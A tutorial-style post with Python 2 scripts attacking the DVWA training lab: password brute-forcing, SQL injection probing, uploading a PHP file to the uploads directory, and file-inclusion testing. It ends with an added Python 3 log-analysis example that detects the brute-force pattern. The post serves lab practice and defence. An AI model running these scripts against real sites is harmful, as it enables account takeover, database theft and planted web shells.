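Python scripts for DVWA

First, the DVWA setup: here I used the integrated environment phpstudy to build it locally. Before using the scripts below, change security to low in DVWA's config.ini.php file, or manually capture the cookie at the low level. The Python version is 2.7.
  • Brute force  Security level: low

    The IP is the local IP and the txt file is in the same directory; change both as needed.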

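# -*- coding: utf-8 -*-
import httplib2
import sys

argc = len(sys.argv) - 1
argv = sys.argv[1:]
# At most two arguments are accepted: IP address and port
if argc == -1 or argc > 2:
    print "用法:python",sys.argv[0],"IP地址 端口号"
    print "例如:url为http://127.0.0.1:8080/,则IP地址应为127.0.0.1,端口号应为8080"
    sys.exit()

# Defaults used when no arguments are given
ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]

h = httplib2.Http()
url = "http://"+ip+":"+port+"/vulnerabilities/brute/"
# The first request obtains the session cookie
response, content = h.request(url)
# httplib2 stores response header names in lower case
cookie = response["set-cookie"]
header = {"cookie": cookie}
# dict.txt holds one candidate password per line
filepasswords = open("dict.txt", "r")
passwords = filepasswords.readlines()
filepasswords.close()
for password in passwords:
    # Strip only the line ending, so a last line without a newline is not cut short
    password = password.rstrip("\r\n")
    tmp = url+"?username=admin"+"&password="+password+"&Login=Login"
    res, content = h.request(tmp, "GET", "", header)
    # Print the response length next to the credentials that were tried
    print res["content-length"]+":"+"admin"+":"+password+"\n"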
  • SQL injection  Security level: low

    The IP is the local IP and the txt file is in the same directory; change both as needed.

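# -*- coding: utf-8 -*-
import httplib2
import re
import urllib
import sys

argc = len(sys.argv) - 1
argv = sys.argv[1:]
# At most two arguments are accepted: IP address and port
if argc == -1 or argc > 2:
    print "用法:python",sys.argv[0],"IP地址 端口号"
    print "例如:url为http://127.0.0.1:8080/,则IP地址应为127.0.0.1,端口号应为8080"
    sys.exit()

# Defaults used when no arguments are given
ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]

h = httplib2.Http()
# test.txt holds one test string per line
testfile = open('test.txt', 'r')
tests = testfile.readlines()
testfile.close()
url = "http://"+ip+":"+port+"/vulnerabilities/sqli/"
# The first request obtains the session cookie
response, content = h.request(url)
# httplib2 stores response header names in lower case
cookie = response["set-cookie"]
header = {"cookie": cookie}
for test in tests:
    # Strip the line ending before encoding; cutting the last character
    # afterwards would turn the encoded newline "%0A" into a broken "%0"
    m = urllib.quote(test.rstrip("\r\n"))
    n = m.replace('%20', '+')
    tmp = url+"?id="+n+"&Submit=Submit"
    res, content = h.request(tmp, "GET", "", header)
    # The page returns its results inside <pre> elements
    result = re.findall(r'<pre>(.*?)</pre>', content)
    print result
    print '\n'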
  • File upload  Security level: low

    The IP is the local IP; the file this script uploads is on the D: drive; change both as needed.

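# -*- coding: utf-8 -*-
import sys
import requests

argc = len(sys.argv) - 1
argv = sys.argv[1:]
# At most two arguments are accepted: IP address and port
if argc == -1 or argc > 2:
    print "用法:python",sys.argv[0],"IP地址 端口号"
    print "例如:url为http://127.0.0.1:8080/,则IP地址应为127.0.0.1,端口号应为8080"
    sys.exit()

# Defaults used when no arguments are given
ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]

url = "http://"+ip+":"+port+"/vulnerabilities/upload/"
data = None
# Local file to upload, opened in binary mode
files = {'file': open(r'D:\php.php', 'rb')}
h = requests.post(url=url, data=data, files=files)
# Check whether the file is now reachable in the upload directory
# (same host and port as the upload request)
code = requests.get("http://"+ip+":"+port+"/hackable/uploads/php.php").status_code
if code == 200:
    print "文件上传成功"
else:
    print "文件上传失败"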
  • File inclusion  Security level: low

    The IP is the local IP and the txt file is in the same directory; change both as needed.

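# -*- coding: utf-8 -*-
import requests
import sys

argc = len(sys.argv) - 1
argv = sys.argv[1:]
# At most two arguments are accepted: IP address and port
if argc == -1 or argc > 2:
    print "用法:python",sys.argv[0],"IP地址 端口号"
    print "例如:url为http://127.0.0.1:8080/,则IP地址应为127.0.0.1,端口号应为8080"
    sys.exit()

# Defaults used when no arguments are given
ip = "192.168.109.147"
port = "80"

if argc >= 1:
    ip = argv[0]
if argc == 2:
    port = argv[1]

# include.txt holds one value for the page parameter per line
incfile = open('include.txt', 'r')
includes = incfile.readlines()
incfile.close()
# The query string is appended once, in the loop below
url = "http://"+ip+":"+port+"/vulnerabilities/fi/"
for include in includes:
    tmp = url+"?page="+include.rstrip("\r\n")
    res = requests.get(tmp)
    # Only the HTTP status is checked, not the returned content
    if res.status_code == 200:
        print "exploit can be used"
    else:
        print "exploit can't be used"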
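
Seen from the defending side, the brute-force script above sends every guess as a GET request, so user name and password land in the web server's access log, and it tells a hit from a miss by the response length. The following Python 3 code is an added example, not part of the original post: it flags that pattern in an access log. The log lines are constructed, and the function name, the log format and the threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache common-log style (not captured traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.1" 200 4237
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/brute/?username=admin&password=admin&Login=Login HTTP/1.1" 200 4237
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/brute/?username=admin&password=letmein&Login=Login HTTP/1.1" 200 4237
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4275
192.0.2.20 - - [01/Jan/2024:10:05:00 +0000] "GET /vulnerabilities/brute/?username=admin&password=s3cret&Login=Login HTTP/1.1" 200 4237
192.0.2.20 - - [01/Jan/2024:10:05:09 +0000] "GET /index.php HTTP/1.1" 200 6120
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} (\d+|-)')

def find_bruteforce(log_text, path="/vulnerabilities/brute/", threshold=3):
    """Flag (client, username) pairs that tried >= threshold distinct passwords."""
    tried = defaultdict(dict)   # (client, username) -> {password: response size}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, size = m.groups()
        parts = urlsplit(target)
        query = parse_qs(parts.query)
        if parts.path != path or "password" not in query:
            continue
        user = query.get("username", [""])[0]
        tried[(client, user)][query["password"][0]] = size
    findings = {}
    for key, by_password in tried.items():
        if len(by_password) < threshold:
            continue
        sizes = list(by_password.values())
        usual = max(set(sizes), key=sizes.count)
        # The script separates hit from miss by Content-Length, so a response
        # whose size differs from the usual one marks a guess that may have worked.
        findings[key] = {
            "distinct_passwords": len(by_password),
            "odd_size_responses": sum(1 for s in sizes if s != usual),
        }
    return findings   # counts only: the guessed passwords are not repeated in the report

if __name__ == "__main__":
    for (client, user), info in find_bruteforce(SAMPLE_LOG).items():
        print(client, user, info)
```

A non-zero odd_size_responses count is the signal to reset that account's password and review what the client did next.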